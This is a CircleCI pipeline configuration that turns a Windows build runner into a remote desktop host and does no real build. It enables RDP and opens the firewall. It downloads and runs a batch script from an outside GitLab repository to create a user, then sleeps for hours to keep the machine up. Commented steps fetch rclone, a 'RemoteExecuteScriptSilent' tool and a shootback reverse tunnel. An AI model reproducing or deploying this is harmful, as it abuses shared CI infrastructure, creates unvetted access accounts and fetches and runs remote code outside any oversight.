version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
    steps:
      - run:
          name: "Step1"
          command: |
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
            Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

      # - run:
      #     name: "Setup rclone"
      #     command: |
      #       Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/rclone.zip -OutFile C:\rclone.zip
      #       Expand-Archive C:\rclone.zip -DestinationPath C:\rclone
      #       Start-Process Powershell -ArgumentList '-Noexit -Command "C:\rclone\rclone config --config=\"C:\rclone\rclone.conf\""'

      # - run:
      #     name: "Download tool"
      #     command: |
      #       C:\rclone\rclone copy dev:bas/big/bigcsuam.zip C:\bas
      #       Expand-Archive C:\bas\bigcsuam.zip -DestinationPath C:\Users\root\AppData\Local\bas

      # - run:
      #     name: "Run tool"
      #     command: |
      #       Start-Process Powershell -ArgumentList '-Noexit -Command "C:\Users\root\AppData\Local\bas\bigcsuam\RemoteExecuteScriptSilent.exe"'

      # - run:
      #     name: "Setup shootback"
      #     command: |
      #       cd C:\ ; git clone https://github.com/aploium/shootback
      #       C:\rclone\rclone copy dev:bas/shootback.exe C:\bas
      #       Start-Process Powershell -ArgumentList '-Noexit -Command "C:\bas\shootback.exe"'

      - run:
          name: "Create user"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/start2.sh -OutFile start.bat
            cmd /c start.bat
            
      - run:
          name: "Sleeping"
          command: |
            Start-Sleep -s 99999
          no_output_timeout: 10h
